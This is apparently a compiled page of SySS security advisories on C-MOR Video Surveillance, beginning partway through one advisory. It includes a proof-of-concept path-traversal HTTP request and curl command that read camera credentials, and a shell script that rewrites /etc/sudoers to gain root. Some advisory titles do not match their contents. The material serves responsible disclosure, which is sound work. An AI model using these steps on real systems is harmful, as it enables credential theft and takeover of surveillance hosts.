minimal subset of the Python language (version 2.6)  
(...)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-029

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-029.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, and Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Insecure Third-Party Components

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 stores sensitive information, such as credentials, in clear text.

Advisory ID:               SYSS-2024-028  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Cleartext Storage of Sensitive Information   
(CWE-312)  
Risk Level:                Medium  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45175  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Sensitive information is stored in cleartext.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system, it was found that sensitive information,  
for example login credentials of cameras, is stored in clear text.

Thus, an attacker with file system access, for example exploiting a path  
traversal attack (see SYSS-2024-025[3]), has access to the login data of  
all configured cameras or the configured FTP server.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By exploiting the path traversal attack in the backup download script  
"download-bkf.pml", login credentials of cameras can be retrieved, as  
the following HTTP request and the corresponding response demonstrate:

POST /download-bkf.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 24  
Connection: close

bkf=../../../etc/ip.cam1

HTTP/1.1 200 OK  
(...)

192.168.1.11  
80  
<USERNAME>  
<PASSWORD>

This PoC attack can be performed using the following curl command:

curl -X POST -d 'bkf=../../../etc/ip.cam1' --user   
'<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH'   
https://<HOST>/download-bkf.pml  
192.168.1.11  
80  
<USERNAME>  
<PASSWORD>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-028

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-028.txt  
[3] SySS Security Advisory SYSS-2024-025

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt  
[4] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, and Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Information Disclosure / Cleartext Secret

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from an improper privilege management vulnerability that can allows for privilege escalation.

Advisory ID:               SYSS-2024-027  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Improper Privilege Management (CWE-269)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45173  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper privilege management concerning sudo privileges, C-MOR  
is vulnerable to a privilege escalation attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system with shell access (see SYSS-2024-026[3]),  
it was found that the Linux user "www-data" running the C-MOR web  
interface can execute some OS commands as root via sudo without having  
to enter the root password.

These commands, for example, include "cp", "chown", and "chmod", which  
enable an attacker to modify the system's sudoer file in order to  
execute all commands with root privileges.

Thus, it is possible to escalate the limited privileges of the user  
"www-data" to root privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

For demonstrating a privilege escalation attack with shell access as  
the user "www-data", the following shell script was uploaded to the  
C-MOR system and executed:

$ cat privesc.sh  
sudo cp /etc/sudoers /home/cam  
sudo chown www-data /home/cam/sudoers  
sudo chmod 777 /home/cam/sudoers  
echo 'www-data        ALL = (ALL) NOPASSWD: ALL' >> /home/cam/sudoers  
sudo chmod 440 /home/cam/sudoers  
sudo chown root /home/cam/sudoers  
sudo cp /home/cam/sudoers /etc/sudoers  
sudo rm /home/cam/sudoers

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-027

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt  
[3] SySS Security Advisory SYSS-2024-026

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt  
[4] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Tag

#web